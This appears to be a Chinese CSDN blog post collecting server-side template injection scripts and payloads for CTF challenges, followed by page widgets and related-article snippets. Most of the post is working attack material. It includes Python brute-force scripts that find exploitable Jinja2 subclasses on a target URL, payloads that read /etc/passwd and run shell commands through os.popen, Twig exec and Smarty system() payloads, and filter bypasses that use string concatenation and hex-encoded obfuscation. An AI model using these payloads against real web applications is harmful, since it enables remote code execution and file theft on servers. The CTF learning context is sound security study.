SSTI注入

已于 2024-05-01 17:36:41 修改
阅读量351 收藏 11
点赞数 9
文章标签: 网络安全 flask
于 2024-03-16 15:05:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoJing6/article/details/136752532
版权

题主要参考大佬文章,先附上大佬链接

SSTI注入——python中的ssti_python ssti注入-CSDN博客

Flask模板注入 - NPFS - 博客园 (cnblogs.com)

总结几个常用脚本和对应的playload:

1.文件读取脚本

# 引入 request 模块用于发起请求
import requests
# input 定义爆破 url
url = input('请输入 URL : ')
# 设置范围为 500
for i in range(500):
    # 爆破的 payload ,注意关键字 name 为本题接收参数,其他环境应根据实际分析
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "]}}"}
    # 爆破测试
    try:
        # post 请求后的响应信息
        response = requests.post(url, data=data)
        # 打印响应信息
        # print(response.text)

        # 当状态码为 200 时,寻找响应信息中是否包含关键子类
        if response.status_code == 200:
            if '_frozen_importlib_external.FileLoader' in response.text:
                # 若存在,则打印索引值
                print(i)
    except:
        # 不存在或出现错误,则退出本次循环
        pass

playload为:

{{''.__class__.__mro__[2].__subclasses__()[xx].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()}}

2.利用内嵌函数eval:

# 引入 request 模块用于发起请求
import requests
# input 定义爆破 url
url = input('请输入 URL : ')
# 设置范围为 500
for i in range(500):
    # 爆破的 payload ,注意关键字 name 为本题接收参数,其他环境应根据实际分析
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__['__builtins__']}}"}
    # 爆破测试
    try:
        # post 请求后的响应信息
        response = requests.post(url, data=data)
        # 打印响应信息
        # print(response.text)

        # 当状态码为 200 时,寻找响应信息中是否包含关键子类
        if response.status_code == 200:
            if 'eval' in response.text:
                # 若存在,则打印索引值
                print(i)
    except:
        # 不存在或出现错误,则退出本次循环
        pass

playload为:

{{''.__class__.__mro__[2].__subclasses__()[xx].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}

3.os模块脚本:

# 引入 request 模块用于发起请求
import requests
# input 定义爆破 url
url = input('请输入 URL : ')
# 设置范围为 500
for i in range(500):
    # 爆破的 payload ,注意关键字 name 为本题接收参数,其他环境应根据实际分析
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__}}"}
    # 爆破测试
    try:
        # post 请求后的响应信息
        response = requests.post(url, data=data)
        # 打印响应信息
        # print(response.text)

        # 当状态码为 200 时,寻找响应信息中是否包含关键子类
        if response.status_code == 200:
            if 'os.py' in response.text:
                # 若存在,则打印索引值
                print(i)
    except:
        # 不存在或出现错误,则退出本次循环
        pass

playload为:

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

例题shrine,乍眼一看是一个python代码,想到是利用ssti模板注入,利用{{7*7}}返回49表明存在模板注入,但是{{config}}返回错误,显然被过滤了

就用flask内置函数来绕过获取config,下面两个方法都可以,然后就发现了flag

/shrine/{{get_flashed_messages.__globals__}}
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

---------------------------------------------------------------------------------------------------------------------------------

非常经典的一张图,来看看这一题

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

这里在cookie处进行判断

user={{7*‘7’}},查看返回值

由于返回的是49,所以是Twig模块,所以有固定的playload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}//查看id

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

然后可以拿到flag

[CISCN2019 华东南赛区]Web11

这题做过类似的,注入点很可能在X-Forwarded-For上面,而且是Smarty模板

Smarty常用payload:
利用smarty的{if}条件

        {$smarty.version}查看smarty版本号
        {if phpinfo()}{/if}查看php信息
        {if system(‘ls /’)}{/if}查看根目录下的文件
        {if system(‘cat /flag’)}{/if}
        {if readfile(‘/flag’)}{/if}
        {if show_source(‘/flag’)}{/if}

原文链接:https://blog.csdn.net/qq_62414126/article/details/124514254

---------------------------------------------------------------------------------------------------------------------------------

这题输入{{7*‘7’}} 回显7777777说明是jinja2模板,但是我用脚本跑的时候没有反应,看大佬文章才知道是过滤了globals, 于是采用拼接字符串的方法来绕过

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

最后获取flag

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}

如果说有更多的绕过可以考虑先把我们要执行的命令转成ASCII,再进行十六进制编码

{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('ca${Z}t${IFS}/fl*').read()}}

 ?name={{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('ca${Z}t${IFS}/fl*').read()}}

BoJing6
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSTI注入漏洞
大河之犬的博客
06-05 1054
服务器端模板注入是一种漏洞,当攻击者可以将恶意代码注入到在服务器上执行的模板中时发生Jinja是一种常用的用于Web应用程序的模板引擎。在这段易受攻击的代码中,用户请求中的 name 参数直接通过 render 函数传递到模板中。这可能允许攻击者向 name 参数中注入恶意代码,导致服务器端模板注入。将负载注入到name参数中。此负载可以包含Jinja模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,潜在地控制服务器。
SSTI注入的学习
qq_70303095的博客
10-12 352
SSTI注入的简易学习和分析
Flask-SSTI注入
qq_51922767的博客
09-28 1847
一.概述 SSTI即服务端模板注入,是指用户输入的参数被服务端当成模板语言进行了渲染,从而导致代码执行。 1.Flask Flask是一个基于python开发的web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个web应用程序。这个wdb应用程序可以使一些 web 页面、博客、wiki或商业网站。 Flask 属于微框架(micro-framework)这一类别,微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点,优点是框架很轻量,更新时依赖少,并且专注安全方面的 bug,缺
关于flaskSSTI注入
Kr的博客
01-21 7188
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
ssti注入
m0_73818134的博客
07-30 790
ssti分析及绕过
SSTI模板注入
Welcome To Myon'Blog !
07-04 923
1、原理简述 2、常用payload及相关脚本 函数调用、高危函数 3、实战:攻防世界 Web_python_template_injection
SSTI注入利用姿势合集
Aiwin的博客
09-13 584
SSTI注入利用姿势合集
靶场练习 SSTI 注入:技术剖析与防御策略
weixin_43822401的博客
07-11 403
服务器端模板注入是一种常见的Web安全漏洞,允许攻击者在服务器端的模板引擎中执行任意代码。这种漏洞通常由于不安全的模板渲染处理造成。本文将深入探讨SSTI注入的原理、靶场练习方法和防御策略。
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 919
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入python21.2.3.4.5.6.python31.2.
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
2. **参数化查询**:使用预编译的SQL语句或ORM框架,防止SQL注入,同时也有助于防御SSTI。 3. **最小权限原则**:限制模板引擎的功能,禁止执行潜在危险的操作。 4. **使用安全的模板引擎**:选择具有良好安全记录和...
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自James Kett的 ,其他公共研究 ,以及对该工具的原始贡献 。 它可以利用几种代码上下文和盲注...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8419
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
记录一次经历:使用flask_sqlalchemy集成flask造成循环导入问题
2301_76868495的博客
08-21 895
解决flask_sqlalchemy发生死循环的问题
Flask-restful 之 restful 的参数校验
最新发布
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-26 23
如果你不想使用额外的库,你也可以在 Flask-RESTful 资源中编写自定义的校验函数。这通常涉及到在解析参数后,手动检查它们的值是否符合你的要求。# 校验通过,继续处理请求。
Flask中的session
zheshiyangyang的博客
08-22 854
点击“添加session”按钮,服务端会创建一个:“session["test"] = this is test”的session。点击“获取session”按钮,服务端会返回session的值,前端用console.log()打印出这个值。在这里,我们创建了一个简单的前端页面,并且添加了三个按钮,方便为下面的功能做说明。在这里我们推荐使用第二种和第三种,并且定期更新密钥,防止数据泄露。点击“删除session”按钮,服务端会删除所有session。”用来再此请求的时候验证。中的字典一样,我们可以使用。
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值